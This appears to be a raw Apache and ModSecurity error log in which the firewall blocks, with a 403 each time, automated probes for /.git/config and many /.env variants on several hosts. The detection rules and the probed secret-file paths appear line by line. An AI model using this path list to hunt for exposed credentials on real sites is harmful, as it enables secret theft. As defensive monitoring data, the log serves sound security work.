[Fri Feb 14 17:21:47.367621 2025] [:error] [pid 1151893] [client 89.248.163.4:60452] [client 89.248.163.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z69tmxtvxyfpRpgp4okBKQAAAAw"]
[Fri Feb 14 17:21:47.368107 2025] [:error] [pid 1151893] [client 89.248.163.4:60452] [client 89.248.163.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z69tmxtvxyfpRpgp4okBKQAAAAw"]
[Sat Feb 15 03:22:48.757004 2025] [:error] [pid 1161772] [client 13.58.228.70:39754] [client 13.58.228.70] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6_6ePGOMcAsGVQA3yyGpAAAAAI"]
[Sat Feb 15 03:22:48.757793 2025] [:error] [pid 1161772] [client 13.58.228.70:39754] [client 13.58.228.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6_6ePGOMcAsGVQA3yyGpAAAAAI"]
[Sat Feb 15 03:22:48.758215 2025] [:error] [pid 1161772] [client 13.58.228.70:39754] [client 13.58.228.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6_6ePGOMcAsGVQA3yyGpAAAAAI"]
[Sat Feb 15 03:26:47.723096 2025] [:error] [pid 1161778] [client 13.58.228.70:37236] [client 13.58.228.70] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6_7Z2BbwAza5wfjQs6SOAAAAAU"]
[Sat Feb 15 03:26:47.723817 2025] [:error] [pid 1161778] [client 13.58.228.70:37236] [client 13.58.228.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6_7Z2BbwAza5wfjQs6SOAAAAAU"]
[Sat Feb 15 03:26:47.724223 2025] [:error] [pid 1161778] [client 13.58.228.70:37236] [client 13.58.228.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6_7Z2BbwAza5wfjQs6SOAAAAAU"]
[Sat Feb 15 03:26:50.090758 2025] [:error] [pid 1161770] [client 13.58.228.70:37240] [client 13.58.228.70] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6_7avdDu3LLddatRSyv3AAAAAA"]
[Sat Feb 15 03:26:50.091436 2025] [:error] [pid 1161770] [client 13.58.228.70:37240] [client 13.58.228.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6_7avdDu3LLddatRSyv3AAAAAA"]
[Sat Feb 15 03:26:50.091885 2025] [:error] [pid 1161770] [client 13.58.228.70:37240] [client 13.58.228.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6_7avdDu3LLddatRSyv3AAAAAA"]
[Wed Feb 19 10:28:15.776251 2025] [:error] [pid 1258387] [client 92.118.39.228:2182] [client 92.118.39.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z7WkLyBRyX0ZmcdTTScgSwAAAAI"], referer: https://www.google.com/
[Wed Feb 19 10:28:15.778986 2025] [:error] [pid 1258387] [client 92.118.39.228:2182] [client 92.118.39.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z7WkLyBRyX0ZmcdTTScgSwAAAAI"], referer: https://www.google.com/
[Wed Feb 19 10:28:15.779499 2025] [:error] [pid 1258387] [client 92.118.39.228:2182] [client 92.118.39.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z7WkLyBRyX0ZmcdTTScgSwAAAAI"], referer: https://www.google.com/
[Wed Feb 19 10:28:15.989312 2025] [:error] [pid 1258389] [client 92.118.39.228:2192] [client 92.118.39.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "Z7WkL45l_i530XSrJBnIgQAAAAQ"], referer: https://www.google.com/
[Wed Feb 19 10:28:15.990539 2025] [:error] [pid 1258389] [client 92.118.39.228:2192] [client 92.118.39.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "Z7WkL45l_i530XSrJBnIgQAAAAQ"], referer: https://www.google.com/
[Wed Feb 19 10:28:15.991208 2025] [:error] [pid 1258389] [client 92.118.39.228:2192] [client 92.118.39.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "Z7WkL45l_i530XSrJBnIgQAAAAQ"], referer: https://www.google.com/
[Wed Feb 19 10:28:16.703847 2025] [:error] [pid 1258388] [client 92.118.39.228:2222] [client 92.118.39.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "Z7WkMAzqEFiMFYV11ByxQwAAAAM"], referer: https://www.google.com/
[Wed Feb 19 10:28:16.704795 2025] [:error] [pid 1258388] [client 92.118.39.228:2222] [client 92.118.39.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "Z7WkMAzqEFiMFYV11ByxQwAAAAM"], referer: https://www.google.com/
[Wed Feb 19 10:28:16.705248 2025] [:error] [pid 1258388] [client 92.118.39.228:2222] [client 92.118.39.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "Z7WkMAzqEFiMFYV11ByxQwAAAAM"], referer: https://www.google.com/
[Wed Feb 19 10:28:16.867848 2025] [:error] [pid 1259335] [client 92.118.39.228:2228] [client 92.118.39.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "Z7WkMIC8jifnO0kJgZgwSQAAAAk"], referer: https://www.google.com/
[Wed Feb 19 10:28:16.868880 2025] [:error] [pid 1259335] [client 92.118.39.228:2228] [client 92.118.39.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "Z7WkMIC8jifnO0kJgZgwSQAAAAk"], referer: https://www.google.com/
[Wed Feb 19 10:28:16.869340 2025] [:error] [pid 1259335] [client 92.118.39.228:2228] [client 92.118.39.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "Z7WkMIC8jifnO0kJgZgwSQAAAAk"], referer: https://www.google.com/
[Wed Feb 19 10:28:17.036352 2025] [:error] [pid 1258425] [client 92.118.39.228:2234] [client 92.118.39.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /login/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/login/.env"] [unique_id "Z7WkMSMcT3_Z2BZK5CWdOwAAAAU"], referer: https://www.google.com/
[Wed Feb 19 10:28:17.037316 2025] [:error] [pid 1258425] [client 92.118.39.228:2234] [client 92.118.39.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/login/.env"] [unique_id "Z7WkMSMcT3_Z2BZK5CWdOwAAAAU"], referer: https://www.google.com/
[Wed Feb 19 10:28:17.037793 2025] [:error] [pid 1258425] [client 92.118.39.228:2234] [client 92.118.39.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/login/.env"] [unique_id "Z7WkMSMcT3_Z2BZK5CWdOwAAAAU"], referer: https://www.google.com/
[Wed Feb 19 10:28:17.217738 2025] [:error] [pid 1258385] [client 92.118.39.228:2248] [client 92.118.39.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "Z7WkMZMb97vBIjpxehUPPwAAAAA"], referer: https://www.google.com/
[Wed Feb 19 10:28:17.218818 2025] [:error] [pid 1258385] [client 92.118.39.228:2248] [client 92.118.39.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "Z7WkMZMb97vBIjpxehUPPwAAAAA"], referer: https://www.google.com/
[Wed Feb 19 10:28:17.219259 2025] [:error] [pid 1258385] [client 92.118.39.228:2248] [client 92.118.39.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "Z7WkMZMb97vBIjpxehUPPwAAAAA"], referer: https://www.google.com/
[Wed Feb 19 10:28:17.414729 2025] [:error] [pid 1259200] [client 92.118.39.228:2264] [client 92.118.39.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "Z7WkMZybKOPXlKDbX1SYxAAAAAY"], referer: https://www.google.com/
[Wed Feb 19 10:28:17.415757 2025] [:error] [pid 1259200] [client 92.118.39.228:2264] [client 92.118.39.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "Z7WkMZybKOPXlKDbX1SYxAAAAAY"], referer: https://www.google.com/
[Wed Feb 19 10:28:17.416200 2025] [:error] [pid 1259200] [client 92.118.39.228:2264] [client 92.118.39.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "Z7WkMZybKOPXlKDbX1SYxAAAAAY"], referer: https://www.google.com/
[Wed Feb 19 10:28:17.609566 2025] [authz_core:error] [pid 1259202] [client 92.118.39.228:2276] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env, referer: https://www.google.com/
[Wed Feb 19 10:28:17.791202 2025] [:error] [pid 1258387] [client 92.118.39.228:2286] [client 92.118.39.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "Z7WkMSBRyX0ZmcdTTScgTAAAAAI"], referer: https://www.google.com/
[Wed Feb 19 10:28:17.792142 2025] [:error] [pid 1258387] [client 92.118.39.228:2286] [client 92.118.39.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "Z7WkMSBRyX0ZmcdTTScgTAAAAAI"], referer: https://www.google.com/
[Wed Feb 19 10:28:17.792634 2025] [:error] [pid 1258387] [client 92.118.39.228:2286] [client 92.118.39.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "Z7WkMSBRyX0ZmcdTTScgTAAAAAI"], referer: https://www.google.com/
[Wed Feb 19 10:28:18.402428 2025] [:error] [pid 1258386] [client 92.118.39.228:2308] [client 92.118.39.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "Z7WkMqAIC5wiEYk6JNGCXwAAAAE"], referer: https://www.google.com/
[Wed Feb 19 10:28:18.403254 2025] [:error] [pid 1258386] [client 92.118.39.228:2308] [client 92.118.39.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "Z7WkMqAIC5wiEYk6JNGCXwAAAAE"], referer: https://www.google.com/
[Wed Feb 19 10:28:18.403625 2025] [:error] [pid 1258386] [client 92.118.39.228:2308] [client 92.118.39.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "Z7WkMqAIC5wiEYk6JNGCXwAAAAE"], referer: https://www.google.com/
[Wed Feb 19 10:28:18.560698 2025] [:error] [pid 1258388] [client 92.118.39.228:2312] [client 92.118.39.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "Z7WkMgzqEFiMFYV11ByxRAAAAAM"], referer: https://www.google.com/
